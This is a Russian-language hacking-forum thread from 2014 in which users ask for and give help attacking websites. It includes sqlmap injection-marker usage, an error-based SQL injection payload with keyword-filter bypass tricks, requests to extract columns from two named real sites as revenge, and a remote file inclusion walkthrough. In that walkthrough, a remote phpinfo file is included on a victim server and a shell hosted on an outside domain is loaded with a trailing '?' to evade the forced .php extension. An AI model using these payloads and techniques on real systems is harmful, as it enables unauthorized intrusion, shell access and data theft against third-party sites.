Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. iql

    iql New Member

    Joined:
    24 Mar 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    создаю сайт на своем пк через денвер, если адрес стоит 127.0.0.1 то все хорошо, но стоит пописать локальный или интернет адрес, как сайт загружается еле еле без картинок и прочей фигни, кодировка верная, но ничег оен помогает
     
  2. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    56
    Reputations:
    81
    поиграй с / ./ перед адресом папки ведущей до сss/картинок, проверь права на фаилы и директории.
     
    #23222 e17, 5 Apr 2014
    Last edited: 6 Apr 2014
  3. iql

    iql New Member

    Joined:
    24 Mar 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    там всего 3 файла фейка
     
  4. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    Кому не сложно, то.
    Подскажите как sqlmap`у скормить SQL вида:
    http://target.ru/sometext/[SQL]/sometext.html
    Нигде не нашёл описание как скармливать такие ссылки.
    И заодно, как раскручивать через него SQL в заголовках? В частности заголовок user_agent, или переменная окружения QUERY_STRING ? Когда sql идёт таким образом: http://target.ru/'SQL
    Спасибо.
     
  5. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Не пробовали документацию читать?
    Называет custom injection marker:
    http://taget.com/some/*/some.txt
    Вместо "*" втыкается пейлоад. Для ua, если не путаю, -p User-Agent.
     
    1 person likes this.
  6. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    -- есть однострочный комментарий, после которого обязательно должен следовать пробел. Попробуйте также ставить '-- x', чтобы браузер или trim не обрезали пробел в конце. Также возможно, что запрос просто многострочный, некоторые программисты любят городить такие на пару листов. Незакрытый /* может иногда помочь. К тому же, -- специфичен для некоторых субд, в число которых ваша может не входить, а шарп(#) как бы generic sql comment. Также можно попробовать не комментировать остаток, а завернуть его корректно по логике и синтаксису.
     
  7. Anat

    Anat New Member

    Joined:
    3 Oct 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    ............
     
    #23227 Anat, 9 Apr 2014
    Last edited: 3 Mar 2015
  8. Anat

    Anat New Member

    Joined:
    3 Oct 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    ........
     
    #23228 Anat, 9 Apr 2014
    Last edited: 3 Mar 2015
  9. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    https://forum.antichat.ru/showthread.php?p=1255763
     
  10. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Вопрос магистрам sql:
    Есть читалка sql из файла, выполняет все запросы построчно. Но если в начале запроса не присутствует insert into, она его насильно добавляет, точки с запятой вырезаются. Как бы так завернуть insert into или сделать local load подзапросом или вроде того?
     
  11. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса
    ?id=1'or(ExtractValue(1,concat(0x3a,(select(count(*))from(website.user)))))=1
     
  12. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    SeLeCt
    %73elect
     
    _________________________
  13. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Так не работает, есть еще идеи?
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Кто может помочь подобрать столбцы на Jooml'e

    Code:
    http://kinokerch.ru/index.php?option=com_datsogallery&Itemid=30&limitstart=20'
    Ребят, надо проучить кидал..
    Code:
    http://shop-console.com.ua/contact%27
    Кидала
     
    #23234 Unknowhacker, 20 Apr 2014
    Last edited: 28 Apr 2014
  15. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер. нашёл на сайте RFI. но есть одно НО.
    к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:
    "Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."
    как видите сервер добавляет обязательное расширение ".php".
    вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
     
  16. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo
     
  17. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    PHP Version 5.1.6
    да, вывело
     
  18. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    ну вот, дальше уже сам =)
     
  19. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php
     
    #23239 korih, 1 May 2014
    Last edited: 1 May 2014
  20. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Предложи ему такую ссылку:
    http://elitehacker.ru/shell.txt?

    (с вопросом на конце)

    есле помог жми +
     
Loading...
Thread Status:
Not open for further replies.